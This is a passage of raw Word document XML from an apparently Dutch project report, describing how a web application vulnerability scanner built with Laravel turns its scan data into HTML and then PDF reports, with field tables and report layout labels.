              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Referentie ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F5798" w14:paraId="26E4FB5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403A06C" w14:textId="398B2FBE" w:rsidR="002F5798" w:rsidRDefault="002F5798" w:rsidP="008571B9">
            <w:r>
              <w:t>Methode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A2E2242" w14:textId="31D2271C" w:rsidR="002F5798" w:rsidRDefault="002F5798" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>De HTTP-werkwoord die gebruikt is. GET of POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F5798" w14:paraId="63968912" w14:textId="77777777" w:rsidTr="002F5798">
        <w:trPr>
          <w:trHeight w:val="208"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1452" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="334FF1C6" w14:textId="2115543A" w:rsidR="002F5798" w:rsidRDefault="002F5798" w:rsidP="008571B9">
            <w:r>
              <w:t>Datum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CFAFBB1" w14:textId="4A4D02FF" w:rsidR="002F5798" w:rsidRDefault="002F5798" w:rsidP="008571B9">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Datum van gevonden kwetsbaarheid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3ED99518" w14:textId="3C39827A" w:rsidR="000F4055" w:rsidRPr="000F4055" w:rsidRDefault="000F4055" w:rsidP="00B3103C">
      <w:r w:rsidRPr="000F4055">
        <w:t>Tabel 4.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5649FE59" w14:textId="6AE846E7" w:rsidR="00B3103C" w:rsidRPr="00AF6B35" w:rsidRDefault="00AF6B35" w:rsidP="00B3103C">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252236800" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="72834F79" wp14:editId="2512D6EF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-899592</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-893215</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="557" name="Rectangle 5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55FBF" id="Rectangle 557" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.85pt;margin-top:-70.3pt;width:25pt;height:1031.7pt;z-index:-2510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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B3103C" w:rsidRPr="008D42FC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Het genereren van het rapport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490BB741" w14:textId="240B6AC6" w:rsidR="00446588" w:rsidRDefault="00446588" w:rsidP="00B3103C">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252921856" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E0B6316" wp14:editId="58250A98">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-902335</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-710661</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="477" name="Rectangle 47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B0BB5" id="Rectangle 477" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.05pt;margin-top:-55.9pt;width:25pt;height:1031.7pt;z-index:-2503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mCr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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="618220FD" w14:textId="77777777" w:rsidR="00446588" w:rsidRDefault="00446588" w:rsidP="00B3103C"/>
    <w:p w14:paraId="6FAF86E1" w14:textId="69087A1A" w:rsidR="00B3103C" w:rsidRDefault="00B3103C" w:rsidP="00B3103C">
      <w:r>
        <w:t xml:space="preserve">Het genereer proces heeft als doel om de data van een gescande website te verwerken in een rapport van pdf-formaat. De </w:t>
      </w:r>
      <w:r w:rsidR="008748D7">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> heef</w:t>
      </w:r>
      <w:r w:rsidR="003D1D6B">
        <w:t>t hiervoor een feature dat HTML-</w:t>
      </w:r>
      <w:r>
        <w:t>documenten converteren in pdf-</w:t>
      </w:r>
      <w:r w:rsidR="00780F3E">
        <w:t xml:space="preserve">formaten. Dit betekende dat ik de scan data </w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00181317">
        <w:t>erst moet verwerken in een HTML-</w:t>
      </w:r>
      <w:r>
        <w:t>documenten. Een voordeel hiervan is dat de pdf-bestand met HTML en CSS opgemaakt kan worden. Na het converteren wordt het pdf-bestand opgeslagen op de server om vanuit d</w:t>
      </w:r>
      <w:r w:rsidR="000B199F">
        <w:t>aar opgestuurd te worden naar de gebruiker</w:t>
      </w:r>
      <w:r w:rsidR="005E7EF0">
        <w:t>. Het HTML-</w:t>
      </w:r>
      <w:r>
        <w:t>document wordt zelf ook gegenereerd,</w:t>
      </w:r>
      <w:r w:rsidR="00095A73">
        <w:t xml:space="preserve"> hiervoor gebruikt het software</w:t>
      </w:r>
      <w:r>
        <w:t>systeem een dynamische template. Om de HTML en pdf-documenten te genereren wordt er gebruik gemaakt van twee Laravel Libraries:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4530"/>
        <w:gridCol w:w="4530"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B3103C" w14:paraId="6EADA78B" w14:textId="77777777" w:rsidTr="006A0E5F">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531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BD64AD1" w14:textId="77777777" w:rsidR="00B3103C" w:rsidRDefault="00B3103C" w:rsidP="00146C9D">
            <w:r>
              <w:t>Libraries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27010F1E" w14:textId="77777777" w:rsidR="00B3103C" w:rsidRDefault="00B3103C" w:rsidP="00146C9D">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B3103C" w14:paraId="568C6C3A" w14:textId="77777777" w:rsidTr="006A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0181CD" w14:textId="1290F4E6" w:rsidR="00B3103C" w:rsidRDefault="00966311" w:rsidP="00146C9D">
            <w:r>
              <w:t>HTML Builder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FDD4428" w14:textId="75AAB564" w:rsidR="00B3103C" w:rsidRDefault="00554847" w:rsidP="00146C9D">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Voor het bouwen van dynamische HTML documenten</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00554847" w14:paraId="4714F908" w14:textId="77777777" w:rsidTr="006A0E5F">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EA96941" w14:textId="4B3015DC" w:rsidR="00554847" w:rsidRDefault="00E93D35" w:rsidP="00146C9D">
            <w:r>
              <w:t xml:space="preserve">View </w:t>
            </w:r>
            <w:r w:rsidR="00D11CDE">
              <w:t>façade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6437ADD7" w14:textId="66BC96DC" w:rsidR="00554847" w:rsidRDefault="00554847" w:rsidP="00146C9D">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Het renderen van php blade bestanden naar html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B3103C" w14:paraId="7400CA77" w14:textId="77777777" w:rsidTr="006A0E5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531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6420C1AA" w14:textId="30A91D50" w:rsidR="00B3103C" w:rsidRDefault="005611F7" w:rsidP="00146C9D">
            <w:r>
              <w:t>Html2Pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57B2735E" w14:textId="77777777" w:rsidR="00B3103C" w:rsidRDefault="00B3103C" w:rsidP="00146C9D">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Voor het genereren van pdf-documenten</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D6437F5" w14:textId="4CF4AC14" w:rsidR="00B3103C" w:rsidRDefault="000F4055" w:rsidP="00B3103C">
      <w:r>
        <w:t>Tabel 4.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C38E3D" w14:textId="146ACB54" w:rsidR="00B3103C" w:rsidRDefault="00B3103C" w:rsidP="00B3103C">
      <w:r>
        <w:t xml:space="preserve">In het eerste proces wordt met de template die ontwikkeld </w:t>
      </w:r>
      <w:r w:rsidR="00730F33">
        <w:t>is met de HTML Builder een HTML-</w:t>
      </w:r>
      <w:r>
        <w:t>document gemaakt. De dat</w:t>
      </w:r>
      <w:r w:rsidR="000355C1">
        <w:t>a dat de s</w:t>
      </w:r>
      <w:r>
        <w:t>canner component heeft opgeslagen wordt v</w:t>
      </w:r>
      <w:r w:rsidR="00730F33">
        <w:t>erwerkt in de gegenereerde HTML-</w:t>
      </w:r>
      <w:r>
        <w:t>document. In he</w:t>
      </w:r>
      <w:r w:rsidR="00730F33">
        <w:t>t volgende proces wordt de HTML-</w:t>
      </w:r>
      <w:r>
        <w:t>document geconverte</w:t>
      </w:r>
      <w:r w:rsidR="00730F33">
        <w:t>erd naar pdf-</w:t>
      </w:r>
      <w:r w:rsidR="005850A7">
        <w:t>formaat met Html2Pdf</w:t>
      </w:r>
      <w:r w:rsidR="00FC47AE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3134AB01" w14:textId="68B63ED7" w:rsidR="00B3103C" w:rsidRDefault="00B3103C" w:rsidP="00B3103C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A102F09" w14:textId="09367D05" w:rsidR="00250FC7" w:rsidRPr="00712AC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2A05E5" w:rsidRPr="00E14E1E" w:rsidRDefault="002A05E5"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146"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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7A967E0D" w14:textId="24D31D86" w:rsidR="002A05E5" w:rsidRPr="00E14E1E" w:rsidRDefault="002A05E5"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75">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3C98C48F" w14:textId="099FAFBD" w:rsidR="008456FC" w:rsidRDefault="00D422CF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252778496" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="19E28604" wp14:editId="2C590F77">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-900430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-899895</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="645" name="Rectangle 6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43711" id="Rectangle 645" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.9pt;margin-top:-70.8pt;width:25pt;height:1031.7pt;z-index:-2505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k2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9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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008456FC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Het rapport</w:t>
      </w:r>
      <w:r w:rsidR="004423FB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> ontwerp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166FC61B" w14:textId="4BAC891E" w:rsidR="00D422CF" w:rsidRDefault="00340E52">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253209600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="351518DF" wp14:editId="292E75EB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-10795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>8276590</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1079500" cy="235585"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="798" name="Text Box 798"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="107950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75896" w14:textId="766E6F84" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur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18DF" id="Text Box 798" o:spid="_x0000_s1147" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.85pt;margin-top:651.7pt;width:85pt;height:18.5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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7D375896" w14:textId="766E6F84" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 4.21</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000F4055">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252811264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="292F81E4" wp14:editId="184CCB4C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>377825</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2226310</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1516380" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="33020" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="686" name="Text Box 686"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="151638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80D827C" w14:textId="268B2531" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00ED70C3">
                            <w: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F81E4" id="Text Box 686" o:spid="_x0000_s1148" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:29.75pt;margin-top:175.3pt;width:119.4pt;height:18pt;z-index:25281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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="480D827C" w14:textId="268B2531" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00ED70C3">
                      <w:r>
                        <w:t>URL</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E76057">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252844032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="657C858D" wp14:editId="27767BF7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3096260</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>7140575</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2098040" cy="685800"/>
                <wp:effectExtent l="0" t="0" r="35560" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="718" name="Text Box 718"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="209804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42636F" w14:textId="22F9710B" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00EE4F74">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858D" id="Text Box 718" o:spid="_x0000_s1149" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:243.8pt;margin-top:562.25pt;width:165.2pt;height:54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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0742636F" w14:textId="22F9710B" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00EE4F74">
                      <w:r>
                        <w:t>Omschrijving</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0095528F">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252841984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1605A68C" wp14:editId="3E1437D9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1960880</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>7140575</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1023620" cy="685800"/>
                <wp:effectExtent l="0" t="0" r="17780" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="714" name="Text Box 714"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="102362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CFDC75" w14:textId="205F082B" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00EE4F74">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8C" id="Text Box 714" o:spid="_x0000_s1150" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:154.4pt;margin-top:562.25pt;width:80.6pt;height:54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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7FCFDC75" w14:textId="205F082B" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00EE4F74">
                      <w:r>
                        <w:t>Dreigingsniveau</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29696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4ED9F695" wp14:editId="243CF1BA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2656205</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4397375</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2476500" cy="800100"/>
                <wp:effectExtent l="0" t="0" r="38100" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="707" name="Text Box 707"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2476500"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6C0105E" w14:textId="163E101E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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9F695" id="Text Box 707" o:spid="_x0000_s1151" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:209.15pt;margin-top:346.25pt;width:195pt;height:63p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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="06C0105E" w14:textId="163E101E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Omschrijving</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39936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="62986B0E" wp14:editId="252A0C46">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>432435</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>7140575</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1461770" cy="685800"/>
                <wp:effectExtent l="0" t="0" r="36830" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="713" name="Text Box 713"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="146177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954EFA" w14:textId="14053E2E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00EE4F74">
                            <w:r>
                              <w:t>Categorie dreigem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6B0E" id="Text Box 713" o:spid="_x0000_s1152" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:34.05pt;margin-top:562.25pt;width:115.1pt;height:54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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7F954EFA" w14:textId="14053E2E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00EE4F74">
                      <w:r>
                        <w:t>Categorie dreigement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7888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2824A25D" wp14:editId="44934F1D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>433705</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6340475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1842770" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="36830" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="712" name="Text Box 712"/>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23219CF" w14:textId="76780A05" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00431886">
                            <w:r>
                              <w:t>L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4A25D" id="Text Box 712" o:spid="_x0000_s1153" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:34.15pt;margin-top:499.25pt;width:145.1pt;height:18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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="723219CF" w14:textId="76780A05" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00431886">
                      <w:r>
